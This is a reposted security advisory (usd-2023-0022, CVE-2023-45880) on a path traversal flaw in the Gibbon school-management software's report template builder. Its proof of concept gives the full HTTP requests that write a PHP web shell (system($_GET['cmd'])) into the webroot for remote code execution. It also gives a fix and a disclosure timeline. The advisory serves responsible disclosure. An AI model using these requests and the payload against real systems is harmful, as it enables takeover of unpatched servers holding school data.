Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-45880: usd-2023-0022 - usd HeroLab

GibbonEdu Gibbon through version 25.0.0 allows Directory Traversal via the report template builder. An attacker can create a new Asset Component. The templateFileDestination parameter can be set to an arbitrary pathname (and extension). This allows creation of PHP files outside of the uploads directory, directly in the webroot.

CVE
Open in Source
#vulnerability#web#php#rce#auth#webkit

usd-2023-0022 | Path-Traversal

Advisory ID: usd-2023-0022
Product: Gibbon (https://gibbonedu.org/)
Affected Version: 25.0.00
Vulnerability Type: CWE-23
Security Risk: Critical
Vendor URL: https://gibbonedu.org
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE number: CVE-2023-45880

Desciption

Gibbon Edu is an open-source educational software designed for schools and institutions to manage their administrative and academic processes
It offers a range of features to facilitate communication, collaboration, and organization within the educational community.

The application allows high priviliged users to create report templates.
The report template builder is vulnerable to a Path Traversal vulnerability.

The “uploads” directory is not accessible by default, however it is possible to write files directly in the web root.
Even the file extension can be manipulated which results in an arbitrary file write vulnerability.

Proof of Concept

In the first step, we need to duplicate one of the existing assets. This can be done on the Home > Reports > Template Builder > Manage Assets page.

The original request that is triggered is shown below:

POST /modules/Reports/templates_assets_components_duplicateProcess.php HTTP/1.1 Host: localhost:8080 […]

------WebKitFormBoundaryGDOtYymhe5cRMATP Content-Disposition: form-data; name="address"

/modules/Reports/templates_assets_components_duplicate.php ------WebKitFormBoundaryGDOtYymhe5cRMATP Content-Disposition: form-data; name="gibbonReportPrototypeSectionID"

0000000025 ------WebKitFormBoundaryGDOtYymhe5cRMATP Content-Disposition: form-data; name="templateFileDestination"

footers/pageNumber.twig.html ------WebKitFormBoundaryGDOtYymhe5cRMATP–

The templateFileDestination parameter shows where the component template will be saved to. The file can be moved to the webroot, to make it accessible. An attacker can even change the file extension to php.

POST /modules/Reports/templates_assets_components_duplicateProcess.php HTTP/1.1 Host: localhost:8080 […]

------WebKitFormBoundaryGDOtYymhe5cRMATP Content-Disposition: form-data; name="address"

/modules/Reports/templates_assets_components_duplicate.php ------WebKitFormBoundaryGDOtYymhe5cRMATP Content-Disposition: form-data; name="gibbonReportPrototypeSectionID"

0000000025 ------WebKitFormBoundaryGDOtYymhe5cRMATP Content-Disposition: form-data; name="templateFileDestination"

…/…/…/usd.php ------WebKitFormBoundaryGDOtYymhe5cRMATP–

The file can be created from within the web application. You can insert PHP code and receive remote code execution.

This will result in the following request to be triggered

POST /modules/Reports/templates_assets_components_editProcess.php HTTP/1.1 Host: localhost:8080 […]

------WebKitFormBoundaryfnqLMucCLAXR1frS Content-Disposition: form-data; name="address"

/modules/Reports/templates_assets_components_edit.php ------WebKitFormBoundaryfnqLMucCLAXR1frS Content-Disposition: form-data; name="gibbonReportPrototypeSectionID"

0000000028 ------WebKitFormBoundaryfnqLMucCLAXR1frS Content-Disposition: form-data; name="name"

Page Number ------WebKitFormBoundaryfnqLMucCLAXR1frS Content-Disposition: form-data; name="templateFile"

…/…/…/usd.php ------WebKitFormBoundaryfnqLMucCLAXR1frS Content-Disposition: form-data; name="templateContent"

<?php echo system($_GET[‘cmd’]);?> ------WebKitFormBoundaryfnqLMucCLAXR1frS–

It should be noted, that the frontend will return an error that the request "failed due to a database error". However, the file is still created and populated with the payload.
The following screenshot shows, that the file was successfully created and populated with the payload.

Fix

It is recommended to prevent passing user-supplied input to filesystem operations.
If this is required, escape user input before processing it. Use a whitelist approach to only allow valid input.

References

  • https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include

Timeline

  • 2023-07-11: Vulnerability identified by Christian Poeschl
  • 2023-09-19: Security Release v25.0.01
  • 2023-11-02: Advisory published

Credits

This security vulnerability was identified by Christian Poeschl of usd AG.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE